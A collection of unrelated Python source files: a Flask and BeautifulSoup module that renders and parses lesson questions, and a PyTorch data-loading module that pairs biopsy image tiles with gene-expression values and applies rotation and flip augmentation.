fig.savefig('spare_quant_viz/{}/{}.png'.format(quant_method,random_data_pt))
plt.close(fig)
|
from abc import ABC, abstractmethod
from enum import Enum
import json
from bs4 import BeautifulSoup, Tag
from flask import render_template
from curriculum import model, repository
from responses import repository as responses_repository
class RenderTarget(Enum):
AUTHORING = 1
TEACHING = 2
RESPONDING = 3
class _HtmlProcessor(ABC):
def process_html(self, html: str):
soup = BeautifulSoup(html, 'html.parser')
node_func_map = {
'question_choice': self._process_choice_node,
'question_paragraph': self._process_paragraph_node,
'question_inline_text': self._process_inline_text_node,
'question_inline_dropdown': self._process_inline_dropdown_node,
'question_rubric': self._process_rubric_node
}
question_nodes = soup.find_all(class_='wysiwyg_question')
for node in question_nodes:
question_class = next(class_name for class_name in node['class'] if class_name in node_func_map)
node_func_map[question_class](node)
return soup.prettify()
@abstractmethod
def _process_choice_node(self, node):
...
@abstractmethod
def _process_paragraph_node(self, node):
...
@abstractmethod
def _process_inline_text_node(self, node):
...
@abstractmethod
def _process_inline_dropdown_node(self, node):
...
@abstractmethod
def _process_rubric_node(self, node):
...
@classmethod
def _set_question_id(cls, node: Tag, question_id: int):
node['question_id'] = question_id
@classmethod
def _get_question_id(cls, node: Tag):
return node.get('question_id')
class LessonRenderer(_HtmlProcessor):
def __init__(self, render_target: RenderTarget):
self.render_target = render_target
self.question_answer_map = {}
def process_html(self, html: str, user_id: int, lesson_id: int):
if self.render_target == RenderTarget.AUTHORING:
return html
if self.render_target == RenderTarget.RESPONDING:
self.question_answer_map = responses_repository.AnswerRepository.user_answer_map_for_lesson(
user_id=user_id,
lesson_id=lesson_id
)
return super(LessonRenderer, self).process_html(html)
def _process_choice_node(self, node: Tag):
question_id = self._get_question_id(node)
answer = self.question_answer_map.get(int(question_id))
options = json.loads(node['options'])
display_html = render_template(
'response_fields/multiple_choice.html',
question_id=question_id,
answer=answer,
options=options,
is_teacher=self.render_target == RenderTarget.TEACHING,
is_student=self.render_target == RenderTarget.RESPONDING
)
self._replace_node(node, display_html)
def _process_paragraph_node(self, node: Tag):
question_id = self._get_question_id(node)
answer = self.question_answer_map.get(int(question_id))
display_html = render_template(
'response_fields/paragraph_text.html',
question_id=question_id,
answer=answer,
is_teacher=self.render_target == RenderTarget.TEACHING,
is_student=self.render_target == RenderTarget.RESPONDING
)
self._replace_node(node, display_html)
def _process_inline_text_node(self, node: Tag):
question_id = self._get_question_id(node)
answer = self.question_answer_map.get(int(question_id))
display_html = render_template(
'response_fields/inline_text.html',
question_id=question_id,
answer=answer,
is_teacher=self.render_target == RenderTarget.TEACHING
)
self._replace_node(node, display_html)
def _process_inline_dropdown_node(self, node: Tag):
question_id = self._get_question_id(node)
answer = self.question_answer_map.get(int(question_id))
option_list = json.loads(node['options'])
display_html = render_template(
'response_fields/inline_select.html',
options=option_list,
question_id=question_id,
answer=answer,
is_teacher=self.render_target == RenderTarget.TEACHING,
option_map=json.dumps({
option['id']: option['text']
for option in option_list
})
)
self._replace_node(node, display_html)
def _process_rubric_node(self, node):
question_id = self._get_question_id(node)
items_json_str = node['rubric-items']
items = json.loads(items_json_str)
answer = self.question_answer_map.get(int(question_id))
if answer:
rubric_grades = {rubric_grade.rubric_item_id: rubric_grade.grade for rubric_grade in answer.rubric_grades}
else:
rubric_grades = {}
display_html = render_template(
'response_fields/rubric.html',
is_teacher=self.render_target == RenderTarget.TEACHING,
question_id=question_id,
rubric_items=items,
rubric_grades=rubric_grades,
answer=answer,
items_json_str=items_json_str
)
self._replace_node(node, display_html)
@classmethod
def _replace_node(cls, node, html_str):
node.replace_with(BeautifulSoup(html_str, 'html.parser'))
class QuestionParser(_HtmlProcessor):
"""Responsible for going through any lesson html that is being saved to upsert any question data from the html"""
def __init__(self, page_id: int):
self.page_id = page_id
self.id_resolution_map = {
'questions': {},
'options': {},
'rubric_items': {}
}
def _process_choice_node(self, node):
option_list = json.loads(node['options'])
question = self._build_question(
_id=self._get_question_id(node),
_type=model.QuestionType.CHOICE,
)
question.options = [
model.Option(id=option['id'], text=option['html'])
for option in option_list
]
question = self._upsert_and_finalize(question=question, node=node)
for index, option in enumerate(option_list):
if str(option['id']).startswith('temp-option-'):
self.id_resolution_map['options'][option['id']] = question.options[index].id
node['options'] = json.dumps([
{'id': option.id, 'html': option.text}
for option in question.options
])
def _process_paragraph_node(self, node):
question = self._build_question(
_id=self._get_question_id(node),
_type=model.QuestionType.PARAGRAPH,
)
self._upsert_and_finalize(question=question, node=node)
def _process_inline_text_node(self, node):
question = self._build_question(
_id=self._get_question_id(node),
_type=model.QuestionType.INLINE_TEXT,
)
self._upsert_and_finalize(question=question, node=node)
def _process_inline_dropdown_node(self, node):
option_list = json.loads(node['options'])
client_question = self._build_question(
_id=self._get_question_id(node),
_type=model.QuestionType.INLINE_DROPDOWN
)
client_question.options = [
model.Option(id=None, text=option.get('text'))
for option in option_list
]
question = self._upsert_and_finalize(question=client_question, node=node)
node['options'] = json.dumps([
{'text': option.text, 'id': option.id}
for option in question.options
])
def _process_rubric_node(self, node):
rubric_items = json.loads(node['rubric-items'])
client_question = self._build_question(
_id=self._get_question_id(node),
_type=model.QuestionType.RUBRIC
)
client_question.rubric_items = [
self._get_rubric_item_from_json(item_json=item)
for item in rubric_items
]
question = self._upsert_and_finalize(question=client_question, node=node)
node['rubric-items'] = json.dumps([
{'id': item.id, 'text': item.text, 'points': item.points}
for item in question.rubric_items
])
if any(item.id is None for item in client_question.rubric_items):
self.id_resolution_map['rubric_items'][question.id] = [
item.id for item in question.rubric_items
]
return node
@classmethod
def _get_rubric_item_from_json(cls, item_json):
item_id = item_json.get('id')
if item_id and isinstance(item_id, str) and item_id.startswith('temp'):
item_id = None
return model.RubricItem(
id=item_id,
text=item_json.get('text'),
points=item_json.get('points')
)
def _upsert_and_finalize(self, question: model.Question, node: Tag):
question = repository.QuestionRepository.upsert(question)
self._set_question_id(node, question.id)
if 'temp-id' in node.attrs:
self.id_resolution_map['questions'][node.attrs['temp-id']] = question.id
del node.attrs['temp-id']
return question
def _build_question(self, _id: int, _type: model.QuestionType):
return model.Question(
id=_id,
type=_type,
page_id=self.page_id
)
|
import csv
import gzip
import os
import cv2
from tqdm import tqdm
from time import sleep
import shutil
import matplotlib
import matplotlib.pyplot as plt
import scipy.io
import pandas as pd
import numpy as np
import projectModels
import projectUtilities
import torch
import torchvision
import torchvision.transforms as torchTransform
from torchvision.datasets import ImageFolder, DatasetFolder
from sklearn.decomposition import NMF
from torch.utils.data import Dataset, DataLoader, ConcatDataset
## -------------------------------------------------------------------------
##
## Below: functions used to assist preparaing our data for insertion and usage
## inside the STDL classes that appear in this file
##
## -------------------------------------------------------------------------
def load_dataset_from_images_folder(path_to_images, im_hight_and_width_size):
'''
`load_dataset_from_images_folder`
This function creates a pytorch `ImageFolder` object (which is a dataset) from the given image folder path
NOTE: the dataset refered to here is the imageFolder dataset created from the original images folder
NOTE: edge case in which the folder path is not correct or does not exist was not implemented.
'''
print("\n----- entered function load_dataset_from_pictures_folder -----")
tf = torchTransform.Compose([
# Resize to constant spatial dimensions
torchTransform.Resize((im_hight_and_width_size, im_hight_and_width_size)),
# Convert image to greyscale
torchTransform.Grayscale(num_output_channels=3), # 3 means: R==G==B. this is important for the model inputs later
# PIL.Image -> torch.Tensor
torchTransform.ToTensor(),
# Dynamic range [0,1] -> [-1, 1]
torchTransform.Normalize(mean=(.5, .5, .5), std=(.5, .5, .5)),
])
dataset_object = ImageFolder(os.path.dirname(path_to_images), tf)
print("\n----- finished function load_dataset_from_pictures_folder -----\n")
return dataset_object
def load_augmented_dataset_from_images_folder(path_to_images, im_hight_and_width_size):
'''
`load_augmented_dataset_from_images_folder`
This function creates a pytorch `ImageFolder` object (which is a dataset) from the given image folder path
This is done by creating several dataset object, and then concatenating them using the `STDL_ConcatDataset_of_ImageFolders` class
which can be seen below in this file
the function is very similar to the above `load_dataset_from_images_folder` only with more transformation for the augmentation
Augmentation: the augmentation of the dataset is expressed in the large number of transformations.
every image is `transformed` 8 times:
normal, 90^, 180^, 270^, flipped, flipped 90^, flipped 180^, flipped 270^
the code below creats a new `ImageFolder` dataset object after each transformation. everntuall they will all be concatanated as mentioned above.
NOTE: the dataset refered to here is the imageFolder dataset created from the original images folder
NOTE: edge case in which the folder path is not correct or does not exist was not implemented.
NOTE: dont freak out from the large amount of code, most of this function is transformations that are "copy-pasted" with slight differences.
There are overall 8 differnt transformation - 0/90/180/270 , and the same four flipped horizontaly
'''
print("\n----- entered function load_augmented_dataset_from_images_folder -----")
# note that this next "compose" actually a pipeline
tf_original = torchTransform.Compose([
# Resize to constant spatial dimensions
torchTransform.Resize((im_hight_and_width_size, im_hight_and_width_size)),
# Convert image to greyscale
torchTransform.Grayscale(num_output_channels=3), # 3 means: R==G==B. this is important for the model inputs later,
# PIL.Image -> torch.Tensor
torchTransform.ToTensor(),
# Dynamic range [0,1] -> [-1, 1]
torchTransform.Normalize(mean=(.5, .5, .5), std=(.5, .5, .5)),
])
dataset_object_original = ImageFolder(os.path.dirname(path_to_images), tf_original)
# note that this next "compose" actually a pipeline
tf_rotated_90 = torchTransform.Compose([
# Resize to constant spatial dimensions
torchTransform.Resize((im_hight_and_width_size, im_hight_and_width_size)),
# Rotate image:
# NOTE: degrees (sequence or float or int) – Range of degrees to select from. If degrees is a number instead of sequence like (min, max), the range of degrees will be (-degrees, +degrees).
torchTransform.RandomRotation((90,90)),
# Convert image to greyscale
torchTransform.Grayscale(num_output_channels=3), # 3 means: R==G==B. this is important for the model inputs later,
# PIL.Image -> torch.Tensor
torchTransform.ToTensor(),
# Dynamic range [0,1] -> [-1, 1]
torchTransform.Normalize(mean=(.5, .5, .5), std=(.5, .5, .5)),
])
dataset_object_90 = ImageFolder(os.path.dirname(path_to_images), tf_rotated_90)
# note that this next "compose" actually a pipeline
tf_rotated_180 = torchTransform.Compose([
# Resize to constant spatial dimensions
torchTransform.Resize((im_hight_and_width_size, im_hight_and_width_size)),
# Rotate image:
# NOTE: degrees (sequence or float or int) – Range of degrees to select from. If degrees is a number instead of sequence like (min, max), the range of degrees will be (-degrees, +degrees).
torchTransform.RandomRotation((180,180)),
# Convert image to greyscale
torchTransform.Grayscale(num_output_channels=3), # 3 means: R==G==B. this is important for the model inputs later,
# PIL.Image -> torch.Tensor
torchTransform.ToTensor(),
# Dynamic range [0,1] -> [-1, 1]
torchTransform.Normalize(mean=(.5, .5, .5), std=(.5, .5, .5)),
])
dataset_object_180 = ImageFolder(os.path.dirname(path_to_images), tf_rotated_180)
# note that this next "compose" actually a pipeline
tf_rotated_270 = torchTransform.Compose([
# Resize to constant spatial dimensions
torchTransform.Resize((im_hight_and_width_size, im_hight_and_width_size)),
# Rotate image:
# NOTE: degrees (sequence or float or int) – Range of degrees to select from. If degrees is a number instead of sequence like (min, max), the range of degrees will be (-degrees, +degrees).
torchTransform.RandomRotation((270,270)),
# Convert image to greyscale
torchTransform.Grayscale(num_output_channels=3), # 3 means: R==G==B. this is important for the model inputs later,
# PIL.Image -> torch.Tensor
torchTransform.ToTensor(),
# Dynamic range [0,1] -> [-1, 1]
torchTransform.Normalize(mean=(.5, .5, .5), std=(.5, .5, .5)),
])
dataset_object_270 = ImageFolder(os.path.dirname(path_to_images), tf_rotated_270)
# note that this next "compose" actually a pipeline
tf_original_flipped = torchTransform.Compose([
# Resize to constant spatial dimensions
torchTransform.Resize((im_hight_and_width_size, im_hight_and_width_size)),
# flip horizontaly (p=1 == probability for flipping is 1 == always flip)
torchTransform.RandomHorizontalFlip(p=1),
# Convert image to greyscale
torchTransform.Grayscale(num_output_channels=3), # 3 means: R==G==B. this is important for the model inputs later,
# PIL.Image -> torch.Tensor
torchTransform.ToTensor(),
# Dynamic range [0,1] -> [-1, 1]
torchTransform.Normalize(mean=(.5, .5, .5), std=(.5, .5, .5)),
])
dataset_object_original_flipped = ImageFolder(os.path.dirname(path_to_images), tf_original)
# note that this next "compose" actually a pipeline
tf_rotated_90_flipped = torchTransform.Compose([
# Resize to constant spatial dimensions
torchTransform.Resize((im_hight_and_width_size, im_hight_and_width_size)),
# flip horizontaly (p=1 == probability for flipping is 1 == always flip)
torchTransform.RandomHorizontalFlip(p=1),
# Rotate image:
# NOTE: degrees (sequence or float or int) – Range of degrees to select from. If degrees is a number instead of sequence like (min, max), the range of degrees will be (-degrees, +degrees).
torchTransform.RandomRotation((90,90)),
# Convert image to greyscale
torchTransform.Grayscale(num_output_channels=3), # 3 means: R==G==B. this is important for the model inputs later,
# PIL.Image -> torch.Tensor
torchTransform.ToTensor(),
# Dynamic range [0,1] -> [-1, 1]
torchTransform.Normalize(mean=(.5, .5, .5), std=(.5, .5, .5)),
])
dataset_object_90_flipped = ImageFolder(os.path.dirname(path_to_images), tf_rotated_90)
# note that this next "compose" actually a pipeline
tf_rotated_180_flipped = torchTransform.Compose([
# Resize to constant spatial dimensions
torchTransform.Resize((im_hight_and_width_size, im_hight_and_width_size)),
# flip horizontaly (p=1 == probability for flipping is 1 == always flip)
torchTransform.RandomHorizontalFlip(p=1),
# Rotate image:
# NOTE: degrees (sequence or float or int) – Range of degrees to select from. If degrees is a number instead of sequence like (min, max), the range of degrees will be (-degrees, +degrees).
torchTransform.RandomRotation((180,180)),
# Convert image to greyscale
torchTransform.Grayscale(num_output_channels=3), # 3 means: R==G==B. this is important for the model inputs later,
# PIL.Image -> torch.Tensor
torchTransform.ToTensor(),
# Dynamic range [0,1] -> [-1, 1]
torchTransform.Normalize(mean=(.5, .5, .5), std=(.5, .5, .5)),
])
dataset_object_180_flipped = ImageFolder(os.path.dirname(path_to_images), tf_rotated_180)
# note that this next "compose" actually a pipeline
tf_rotated_270_flipped = torchTransform.Compose([
# Resize to constant spatial dimensions
torchTransform.Resize((im_hight_and_width_size, im_hight_and_width_size)),
# flip horizontaly (p=1 == probability for flipping is 1 == always flip)
torchTransform.RandomHorizontalFlip(p=1),
# Rotate image:
# NOTE: degrees (sequence or float or int) – Range of degrees to select from. If degrees is a number instead of sequence like (min, max), the range of degrees will be (-degrees, +degrees).
torchTransform.RandomRotation((270,270)),
# Convert image to greyscale
torchTransform.Grayscale(num_output_channels=3), # 3 means: R==G==B. this is important for the model inputs later,
# PIL.Image -> torch.Tensor
torchTransform.ToTensor(),
# Dynamic range [0,1] -> [-1, 1]
torchTransform.Normalize(mean=(.5, .5, .5), std=(.5, .5, .5)),
])
dataset_object_270_flipped = ImageFolder(os.path.dirname(path_to_images), tf_rotated_270)
# now that we finished creating the datasets, we will create a huge new dataset.
# important premise - in all roatations, image names remain the same. this is important because this is our mapping to our gene expression values from matrix_dataframe
datasets_to_concatanate = [dataset_object_original, dataset_object_90, dataset_object_180, dataset_object_270,
dataset_object_original_flipped, dataset_object_90_flipped, dataset_object_180_flipped, dataset_object_270_flipped]
final_dataset_object = STDL_ConcatDataset_of_ImageFolders(datasets_to_concatanate)
print("\n----- finished function load_augmented_dataset_from_images_folder -----\n")
return final_dataset_object
def perform_log_1p_normalization(df):
'''
perform log 1P normaliztion on the dataframe matrix values:
note that the original dataframe contains "count" values (integers from 0 to max value)
the transformation of a single value will be as follows:
(step 1) add +1 to each entry
(step 2) perform a log transformation for each entry
according to numpy:
> Return the natural logarithm of one plus the input array, element-wise.
> Calculates log(1 + x).
'''
print(f'performing log1P transformation of the dataframe ...\n')
# step 1 and 2 combined
df_normalized = df.apply(np.log1p)
# # print if wanted
# projectUtilities.printInfoAboutReducedDF(df_normalized)
return df_normalized
def cut_samples_with_no_matching_image_and_reorder_df_mandalay(stdata_df, image_folder_of_the_df):
'''
Goal: cut samples that do not have matching images
Challenge: samples might be missing from both ends - samples from stdata_df might not be present in the image folder and vice verse.
This function solves this challenge to obtain the goal.
NOTE: this function also reorders the dataframe. (see the note in the end of this function)
'''
print(f'cutting samples that dont have mathching images in the image folder from the dataframe ...')
# verify that this is a regular (and not augmented) image folder
if not hasattr(image_folder_of_the_df, 'samples'): # meaning this is a custom DS I built - STDL_ConcatDataset_of_ImageFolders
raise NameError(' wrong image folder type... insert the regular, not augmented one ')
#
list_of_index_tuples = [] # each element in the list will be a tuple containing (index in image folder, column index in the orig df, column index in the new df)
# get indices of samples that DO exist in the image folder, add them to `existing_sampexisting_samples_list_in_image_folderles_list`
existing_samples_list_in_image_folder = []
for index_in_image_folder, element in enumerate(image_folder_of_the_df.samples):
filename = element[0]
curr_sample_name = filename.partition('_x')[0].partition('/images/')[2].partition('_')[0] # [0] means verything before the token, [2] means everything after the token
existing_samples_list_in_image_folder.append(curr_sample_name)
existing_samples_list_in_stdata_df = stdata_df.index.to_list()
existing_samples_list_intersection = list(set(existing_samples_list_in_image_folder) & set(existing_samples_list_in_stdata_df))
existing_samples_list_intersection.sort() # TODO: check if needed - see code line below for reason to sort in the first place
# save the updated dataframe
updated_df = stdata_df.loc[existing_samples_list_intersection,:] # keep only the wanted rows from the dataframe # NOTE !!!!! this line returns a dataframe in which the rows are ORDERED BY THE ORDER OF `column_list` !!!!
# print(f'original df info:\n{stdata_df.info()}') #TODO: delete later
# print(f'updated_df info:\n{updated_df.info()}') #TODO: delete later
print(f'V done :)\n')
return updated_df
## -------------------------------------------------------------------------
##
## End of the segment above
## Below: classes used to load and maintain images and stdata information
## These are the actually stdata datasets.
##
## -------------------------------------------------------------------------
class STDL_Dataset_SingleValuePerImg_Mandalay(torch.utils.data.Dataset):
'''
`STDL_Dataset_SingleValuePerImg_Mandalay`
this is the main custom dataset class that will hold information on images and gene expression value.
NOTE: every element of the dataset is a 2d tuple of: (img tensor, gene exp value)
NOTE: the above gene exp value is for a given specific gene
NOTE: this class by its nature uses 'lazy allocation' - when initializing the dataset, nothing is actually being loaded but addresses and links.
only when invoking `__getitem__`with a specific index - a single image is attached to its gene expression level
'''
def __init__(self, imageFolder, stdata_dataframe, chosen_gene_name):
print("\n----- entering __init__ phase of STDL_Dataset_SingleValuePerImg -----")
# Save important information from outside
self.imageFolder = imageFolder
self.stdata_dataframe = stdata_dataframe
self.gene_name = chosen_gene_name
# self.row_mapping, self.column_mapping = row_mapping, column_mapping #TODO: not sure if needed
# save additional information
self.num_of_features_stdata_df = len(stdata_dataframe.columns) #TODO: verify: does this include the headers or not !?!?
self.num_of_samples_stdata_df = len(stdata_dataframe.index) #TODO: verify: does this include the headers or not !?!?
self.size_of_dataset = len(self.imageFolder) # NOTE: size_of_dataset != num_of_samples when the dataset is AUGMENTED - see if clause below
#
if hasattr(self.imageFolder, 'samples'): # meaning this is a regular "ImageFolder" type
self.num_of_images_with_no_augmentation = self.size_of_dataset
else: # meaning this is a custom DS I built - STDL_ConcatDataset_of_ImageFolders
self.num_of_images_with_no_augmentation = imageFolder.dataset_lengths_list[0] # NOTE: the concatanated dataset has the original list of datasets inside it. first in that list is the original untransformed imageFolder DS
'''
create the reduced dataframe == a dataframe with only one row
'''
# first get the requested gene's column index + check if requested gene name actually appears in the stdata_dataframe
requested_column_index = -1
if chosen_gene_name not in stdata_dataframe.columns:
raise ValueError('A very specific bad thing happened.') #TODO: this means that someone who creates this custom dataset needs to do so using TRY CATCH
else:
requested_column_index = stdata_dataframe.columns.to_list().index(chosen_gene_name) #Note: please see: https://stackoverflow.com/questions/176918/finding-the-index-of-an-item-in-a-list # assumption - theres only one occurunce of the gene name in the list
# get the reduced dataframe
self.reduced_dataframe = self.stdata_dataframe.iloc[:, requested_column_index] # get only the relevant gene's COLUMN over ALL samples (== all rows)
# self.reduced_dataframe.rename( columns={0 :'values'}, inplace=True ) # since the previous line gave us one column of values with no name, I renamed it
print("\n----- finished __init__ phase of STDL_Dataset_SingleValuePerImg -----\n")
def __len__(self):
# 'Denotes the total number of samples'
return len(self.imageFolder)
def __getitem__(self, index):
'''
# 'Generates one sample of data'
# Select sample
Task: attach the y value of a single img
'''
## get information about the image depending on the object type
if hasattr(self.imageFolder, 'samples'): # meaning this is a regular "ImageFolder" type
curr_filename = self.imageFolder.samples[index][0]
curr_img_tensor = self.imageFolder[index][0] # note that this calls __get_item__ and returns the tensor value
else: # meaning this is a custom DS I built - STDL_ConcatDataset_of_ImageFolders
curr_img_tensor, curr_filename = self.imageFolder[index]
# for me
X = curr_img_tensor # this is actually X_i
# get the sample's name from its absolute path and file name
# print(f'\ncurr_filename {curr_filename}') # TODO: TO DELETE !!!<----
curr_sample_name = curr_filename.partition('_x')[0].partition('/images/')[2].partition('_')[0] # [0] means verything before the token, [2] means everything after the token
# print(f'curr_sample_name {curr_sample_name}') # TODO: TO DELETE !!!<----
# get the y value's ROW in the gene expression matrix MTX
# print(f'inside __getitem__ with index {index}, curr_sample_name is {curr_sample_name} curr_filename {curr_filename}') # TODO: delete later
current_gene_expression_value = 0
if curr_sample_name not in self.reduced_dataframe.index.tolist(): # Note: remember that the reduced df here is a pandas series object
current_gene_expression_value = 0 #TODO: THIS IS "THE DANGEROUS ASSUMPTION" - if the stdata file does not contain information about this image - I assume that its LOG1P normalized value is 0 !!!!!!!!!!!!!
else:
current_gene_expression_value = self.reduced_dataframe.at[curr_sample_name]
# for me
y = current_gene_expression_value
return X, y #, column #TODO: comment to the left is 171120 #Note: "column" is here for future reference, and is the column in matrix_dataframe that this y value belongs to
class STDL_ConcatDataset_of_ImageFolders(torch.utils.data.Dataset):
'''
`STDL_ConcatDataset_of_ImageFolders`
This is a concatanation of ImageFolder datasets into one unified dataset of images.
NOTE: the assumption is that the list of datastes recieved as input for the __init__ method are all "ImageFolder", and all have the same size
but different transformations
'''
def __init__(self, datasets_list):
self.datasets_list = datasets_list
self.dataset_lengths_list = [len(ds) for ds in datasets_list]
self.index_offsets = np.cumsum(self.dataset_lengths_list) # cumsum = cumulative sum. this returns a list (length of datasets_list) in which every element is a cumulative sum of the length that far.
# say the original DS is size 30. then this returns: [30,60,90,120,...]
self.total_size = np.sum(self.dataset_lengths_list)
# because all of the datasets are supposed to be the same images but transformed differently:
self.single_dataset_length = self.dataset_lengths_list[0] #note that all datasets are supposed to be the same length
self.list_of_image_filenames = [filename for (filename, not_relevant) in self.datasets_list[0].samples] #note that all datasets are supposed to be the same length
def __len__(self):
return self.total_size
def __getitem__(self, index):
'''
note: index (param) is for in the range of the entire concatanated DS
'''
final_index_in_ds = index
for dataset_index, offset in enumerate(self.index_offsets):
if index < offset:
# if needed (if > 0) adjust index inside the wanted ds according to the cummulative index offsets
if dataset_index > 0:
final_index_in_ds = index - self.index_offsets[dataset_index-1]
# prepare information to return
curr_filename = self.list_of_image_filenames[final_index_in_ds]
curr_img_tensor = self.datasets_list[dataset_index][final_index_in_ds][0]
return curr_img_tensor, curr_filename
else:
pass
# if we got here, the index is invalid
raise IndexError(f'{index} exceeds {self.length}')
class STDL_ConcatDataset_of_SingleValuePerImg_Datasets_Mandalay(torch.utils.data.Dataset):
'''
`STDL_ConcatDataset_of_SingleValuePerImg_Datasets_Mandalay`
This is a concatanation of `STDL_Dataset_SingleValuePerImg_Mandalay` datasets into one.
it is needed because for every different "patient" / "biopsy sample" a different `STDL_Dataset_SingleValuePerImg_Mandalay` is created.
NOTE: every element of the dataset is a 2d tuple of: (img tensor, gene exp value)
NOTE: the above gene exp value is for a specific gene
'''
def __init__(self, list_of_datasets):
print("\n----- entering __init__ phase of STDL_ConcatDataset_of_SingleValuePerImg_Datasets_Mandalay -----")
# Save important information from outside
self.STDL_ConcatDataset_of_SingleValuePerImg_Datasets_Mandalay = list_of_datasets
self._list_of_ds_sizes = [len(ds) for ds in list_of_datasets]
self.index_offsets = np.cumsum(self._list_of_ds_sizes) # cumsum = cumulative sum. this returns a list (length of datasets_list) in which every element is a cumulative sum of the length that far.
# say the original DS is size 30. then this returns: [30,60,90,120,...]
self._list_of_ds_sizes_with_no_augmentation = [ds.num_of_images_with_no_augmentation for ds in list_of_datasets]
self.num_of_images_with_no_augmentation = np.cumsum(self._list_of_ds_sizes_with_no_augmentation) # cumsum = cumulative sum. this returns a list (length of datasets_list) in which every element is a cumulative sum of the length that far.
# say the original DS is size 30. then this returns: [30,60,90,120,...]
# self._get_item_track_list = self._list_of_ds_sizes # see logic in __getitem__
# self._curr_ds_index_to_getitem_from = 0 # see logic in __getitem__
self._num_of_all_samples = np.sum(self._list_of_ds_sizes)
print("\n----- finished __init__ phase of STDL_ConcatDataset_of_SingleValuePerImg_Datasets_Mandalay -----\n")
def __len__(self):
return self._num_of_all_samples
def __getitem__(self, index):
'''
note: index (param) is for in the range of the entire concatanated DS
'''
final_index_in_ds = index
for dataset_index, offset in enumerate(self.index_offsets):
if index < offset:
# if needed (if > 0) adjust index inside the wanted ds according to the cummulative index offsets
if dataset_index > 0:
final_index_in_ds = index - self.index_offsets[dataset_index-1]
# return entry from the relevant ds
return self.STDL_ConcatDataset_of_SingleValuePerImg_Datasets_Mandalay[dataset_index][final_index_in_ds]
else:
pass
# if we got here, the index is invalid
raise IndexError(f'{index} exceeds {self.length}')
return
def _save_images_for_leon(self):
'''
This is a temporary function.
it was used to generate sample images for leon to show the differences between different biopsy samples from 10x genomics and mandalay
'''
ds_mandalay = self.STDL_ConcatDataset_of_SingleValuePerImg_Datasets_Mandalay[-3]
ds_patient1 = self.STDL_ConcatDataset_of_SingleValuePerImg_Datasets_Mandalay[-2]
ds_patient2 = self.STDL_ConcatDataset_of_SingleValuePerImg_Datasets_Mandalay[-1]
from torchvision.utils import save_image
# tensor_to_pil = torchTransform.ToPILImage()(ds_mandalay[10][0].squeeze_(0))
# save 4 images from ds_mandalay
save_image(ds_mandalay[10][0], 'leon_mandalay_img1.png')
save_image(ds_mandalay[11][0], 'leon_mandalay_img2.png')
save_image(ds_mandalay[12][0], 'leon_mandalay_img3.png')
save_image(ds_mandalay[20][0], 'leon_mandalay_img4.png')
# save 4 images from ds_patient1
save_image(ds_patient1[10][0], 'leon_patient1_img1.png')
save_image(ds_patient1[11][0], 'leon_patient1_img2.png')
save_image(ds_patient1[12][0], 'leon_patient1_img3.png')
save_image(ds_patient1[20][0], 'leon_patient1_img4.png')
# save 4 images from ds_patient2
save_image(ds_patient2[11][0], 'leon_patient2_img1.png')
save_image(ds_patient2[12][0], 'leon_patient2_img2.png')
save_image(ds_patient2[13][0], 'leon_patient2_img3.png')
save_image(ds_patient2[20][0], 'leon_patient2_img4.png')
## -------------------------------------------------------------------------
##
## End of the segment above
## Below: functions used to prepare data from mandalay in usable folders.
##
## -------------------------------------------------------------------------
'''
IMPORTANT !
The order of the functions below is crucial:
0. the assumption is that you download all your data from scratch. if you already have what was previously used, this is not needed.
1. Download data from mandalay and 10x genomics
2. use `create_stdata_file_from_mtx` to transform the stdata files from the 10x genomics version (they have 3 files instead of 1: barcodes, features, matrix) into the mandalay version (only 1 file: stdata)
3. use `create_folders_from_new_mandalay_data` on disarray data from mandaly. this creates a folder, with subfolders for each biopsy from mandalay
4. use `create_image_subfolders_in_new_mandalay_data_folders` to create "/images" sub folders iniside biopsy folders mentioned in `3.`
5. `create_image_subfolders_in_new_mandalay_data_folders` calls `create_image_subfolders_in_new_mandalay_data_folders` for every large biopsy image.
this in turn will cut the large biopsy image into smaller ones using the "spots" files.
'''
def create_folders_from_new_mandalay_data(path_to_dir):
'''
`create_folders_from_new_mandalay_data`
Function that was used ONE TIME ONLY to create folders from the data downloaded from mandalay.
NOTE: the assumption is that all files are in dissarray in a single folder with a given path.
NOTE: there are only 3 file types in the folder: csv (for spots), jpg (biopsy images that will later be cut), tsv (for the stdata)
NOTE: there are many prints. they were used to help see that the process was working correctly, and are not actually needed
'''
spots_filenames = [filename for filename in listdir(path_to_dir) if filename.endswith(".csv") and not filename.__contains__("metadata")]
images_filenames = [filename for filename in listdir(path_to_dir) if filename.endswith(".jpg")]
stdata_filenames = [filename for filename in listdir(path_to_dir) if filename.endswith(".tsv")]
spots_filenames.sort()
images_filenames.sort()
stdata_filenames.sort()
print(spots_filenames)
print(f'****')
print(images_filenames)
print(f'****')
print(stdata_filenames)
print(f'****')
## testing
### curr_sample_name = curr_filename.partition('_')[0].partition('/images/')[2] # first partition to get everything before the first _ , second partition to get everything after /images/
sample_names_from_spots_filenames = [(name.partition('spots_')[2].partition('.')[0])[2:] for name in spots_filenames]
print(sample_names_from_spots_filenames)
print(f'****')
sample_names_from_images_filenames = [(name.partition('HE_')[2].partition('.')[0])[2:] for name in images_filenames]
print(sample_names_from_images_filenames)
print(f'****')
sample_names_from_stdata_filenames = [(name.partition('_stdata')[0])[2:] for name in stdata_filenames]
print(sample_names_from_stdata_filenames)
print(f'****')
print(f'lengths: {len(sample_names_from_spots_filenames)}, {len(sample_names_from_images_filenames)}, {len(sample_names_from_stdata_filenames)}')
intersection = [name for name in sample_names_from_images_filenames if name in sample_names_from_spots_filenames and name in sample_names_from_stdata_filenames]
print(f'intersection length {len(intersection)} intersection:\n{intersection}')
print(f'****')
## now that we know that the intersection is full:
new_folder_names = sample_names_from_images_filenames
# create a new folder for every biposy sample, each with 3 files:
# 1. original_image.jpg
# 2. spots.csv
# 3. stdata.tsv
# NOTE: in a different function, a 4th object is added: an /images folder that will contain all small images cut from the large biopsy image
for name in new_folder_names:
# create the new folder name
dir_name = os.path.join(path_to_dir, name)
if not os.path.exists(dir_name):
# os.umask(0) # give permissions to the folder
# os.makedirs(dir_name)
try:
original_umask = os.umask(0)
os.makedirs(dir_name, mode=0o777)
finally:
os.umask(original_umask)
## copy all files into the new directory # TODO: copy them with identical names over all files ???
image_filename = [s for s in images_filenames if name in s][0] # return first match that contains "name"
spots_filename = [s for s in spots_filenames if name in s][0] # return first match that contains "name"
stdata_filename = [s for s in stdata_filenames if name in s][0] # return first match that contains "name"
shutil.copy2(src=path_to_dir + image_filename, dst=dir_name + "/original_image.jpg") #TODO: verify endings
shutil.copy2(src=path_to_dir + spots_filename, dst=dir_name + "/spots.csv")
